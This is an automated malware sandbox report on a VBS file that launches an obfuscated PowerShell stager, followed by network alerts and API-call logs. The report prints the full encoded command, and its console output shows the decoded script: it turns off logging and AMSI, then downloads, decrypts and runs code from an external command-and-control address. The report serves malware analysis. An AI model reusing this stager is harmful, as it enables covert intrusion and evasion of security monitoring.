Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 4, 2024, 5:05 p.m.	July 4, 2024, 5:08 p.m.

Size	5.2KB
Type	ASCII text, with very long lines
MD5	`9b5731dd0f4fe8d82ce62e1ef83ebc8c`
SHA256	`9e7dadfce28929497e77947498d90006fd4d9bb915f1368c33af3d144dd29737`
CRC32	`2F8F357D`
ssdeep	`96:zt+EIebN0s4sdzBUIAHqfUgE4gAHlbf3+Gi+vY4CnKY4X+JuBTH4hoQHy3ybh5mA:ztWeKBURECZi41CnKY4X+JgYHawx4s`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Explore.vbs
3052
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA==
  2184

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
117.18.232.200	Active	Moloch
164.124.101.2	Active	Moloch
89.197.154.116	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49169 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49170 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49171 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49172 -> 117.18.232.200:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 117.18.232.200:443 -> 192.168.56.102:49173	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 117.18.232.200:443 -> 192.168.56.102:49174	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 4, 2024, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 4, 2024, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 4, 2024, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 4, 2024, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 4, 2024, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 4, 2024, 5:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 4, 2024, 5:05 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 4, 2024, 5:05 p.m.			0	0

Command line console output was observed (50 out of 60 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: Cannot index into a null array. console_handle: 0x00000023	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: At line:1 char:1858 console_handle: 0x0000002f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: + If($PSVeRSIoNTAble.PSVErsion.Major -GE 3){$1Ce=[rEF].AssemBLY.GeTTYPe('System console_handle: 0x0000003b	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: .Management.Automation.Utils')."GeTFIe`lD"('cachedGroupPolicySettings','N'+'onP console_handle: 0x00000047	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ublic,Static');IF($1ce){$98C=$1CE.GEtValUe($nULl);If($98C['ScriptB'+'lockLoggin console_handle: 0x00000053	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: g']){$98C['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$98C['Scrip console_handle: 0x0000005f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: tB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[COLleCtiONS.GE console_handle: 0x0000006b	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: NEriC.DICTiOnArY[STRInG,SYsTEM.ObjecT]]::NEW();$VaL.ADd('EnableScriptB'+'lockLo console_handle: 0x00000077	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: gging',0);$vAL.Add('EnableScriptBlockInvocationLogging',0);$98c['HKEY_LOCAL_MAC console_handle: 0x00000083	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: HINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Va console_handle: 0x0000008f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: L}ELSE{[SCriptBlock]."GeTFie`LD"('signatures','N'+'onPublic,Static').SETVaLuE($ console_handle: 0x0000009b	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: NuLL,(NeW-ObjECT COllECTIonS.GenErIC.HAshSeT[sTring]))}$REF=[REF].AsSEMbly.GETT console_handle: 0x000000a7	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ype('System.Management.Automation.Amsi'+'Utils');$Ref.GetFIelD('amsiInitF'+'ail console_handle: 0x000000b3	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ed','NonPublic,Static').SetVALUE($NulL,$True);};[SysTEm.NeT.SErVicePoINTMAnagEr console_handle: 0x000000bf	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ]::EXPeCT100CoNtInuE=0;$e2b=[SystEM.TExt.EncodiNg]::ASCII.GeTByteS('d4,0gk@[P*! console_handle: 0x000000cb	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: /fsta:b7QBhlUDr6xE]3_');$R={$D,$e2b=$ARGs;$S=0..255;0..255\|%{$J=($J+$S[$_]+$e2B console_handle: 0x000000d7	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: [$_%$E2B.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S[ console_handle: 0x000000e3	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: $I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxoR$S[($S[$I]+$S[$H])%256]}};$ie=New-O console_handle: 0x000000ef	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: bject -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl console_handle: 0x000000fb	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: =14;$ser=$([Text.ENCodInG]::UnicOdE.GeTStriNG([ConVeRt]::FROmBAsE64STRING('aAB0 console_handle: 0x00000107	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: AHQAcAA6AC8ALwA4ADkALgAxADkANwAuADEANQA0AC4AMQAxADYAOgA3ADgAMQAwAA==')));$t='/l console_handle: 0x00000113	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ogin/process.php';$c="CF-RAY: b'pL8c1rIUMPcYW0L1WcQLFONqCHA='";$ie.navigate2($s console_handle: 0x0000011f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: er+$t,$fl,0,$Null,$c);while($ie.busy){Start-Sleep -Milliseconds 100};$ht = $ie. console_handle: 0x0000012b	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: document.GetType().InvokeMember('body', [System.Reflection.BindingFlags]::GetPr console_handle: 0x00000137	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: operty, $Null, $ie.document, $Null).InnerHtml;try {$data=[System.Convert]::From console_handle: 0x00000143	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: Base64String($ht)} catch {$Null}$Iv=$DATa[ <<<< 0..3];$DAtA=$dATa[4..$dATA.LeNg console_handle: 0x0000014f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: th];-jOIN[CHAr[]](& $R $datA ($IV+$E2b)) \| IEX console_handle: 0x0000015b	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: + CategoryInfo : InvalidOperation: (System.Object[]:Object[]) [], console_handle: 0x00000167	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: RuntimeException console_handle: 0x00000173	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: + FullyQualifiedErrorId : NullArray console_handle: 0x0000017f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: Cannot index into a null array. console_handle: 0x0000019f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: At line:1 char:1876 console_handle: 0x000001ab	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: + If($PSVeRSIoNTAble.PSVErsion.Major -GE 3){$1Ce=[rEF].AssemBLY.GeTTYPe('System console_handle: 0x000001b7	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: .Management.Automation.Utils')."GeTFIe`lD"('cachedGroupPolicySettings','N'+'onP console_handle: 0x000001c3	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ublic,Static');IF($1ce){$98C=$1CE.GEtValUe($nULl);If($98C['ScriptB'+'lockLoggin console_handle: 0x000001cf	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: g']){$98C['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$98C['Scrip console_handle: 0x000001db	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: tB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAl=[COLleCtiONS.GE console_handle: 0x000001e7	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: NEriC.DICTiOnArY[STRInG,SYsTEM.ObjecT]]::NEW();$VaL.ADd('EnableScriptB'+'lockLo console_handle: 0x000001f3	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: gging',0);$vAL.Add('EnableScriptBlockInvocationLogging',0);$98c['HKEY_LOCAL_MAC console_handle: 0x000001ff	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: HINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Va console_handle: 0x0000020b	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: L}ELSE{[SCriptBlock]."GeTFie`LD"('signatures','N'+'onPublic,Static').SETVaLuE($ console_handle: 0x00000217	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: NuLL,(NeW-ObjECT COllECTIonS.GenErIC.HAshSeT[sTring]))}$REF=[REF].AsSEMbly.GETT console_handle: 0x00000223	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ype('System.Management.Automation.Amsi'+'Utils');$Ref.GetFIelD('amsiInitF'+'ail console_handle: 0x0000022f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ed','NonPublic,Static').SetVALUE($NulL,$True);};[SysTEm.NeT.SErVicePoINTMAnagEr console_handle: 0x0000023b	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: ]::EXPeCT100CoNtInuE=0;$e2b=[SystEM.TExt.EncodiNg]::ASCII.GeTByteS('d4,0gk@[P*! console_handle: 0x00000247	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: /fsta:b7QBhlUDr6xE]3_');$R={$D,$e2b=$ARGs;$S=0..255;0..255\|%{$J=($J+$S[$_]+$e2B console_handle: 0x00000253	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: [$_%$E2B.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S[ console_handle: 0x0000025f	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: $I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxoR$S[($S[$I]+$S[$H])%256]}};$ie=New-O console_handle: 0x0000026b	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: bject -COM InternetExplorer.Application;$ie.Silent=$True;$ie.visible=$False;$fl console_handle: 0x00000277	1	1
WriteConsoleW July 4, 2024, 5:06 p.m.	buffer: =14;$ser=$([Text.ENCodInG]::UnicOdE.GeTStriNG([ConVeRt]::FROmBAsE64STRING('aAB0 console_handle: 0x00000283	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6110 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5e50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5a50 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5550 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5c10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b6050 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5f10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:05 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b5610 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00645008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00645008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00645008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00645008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 5:06 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00645008 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
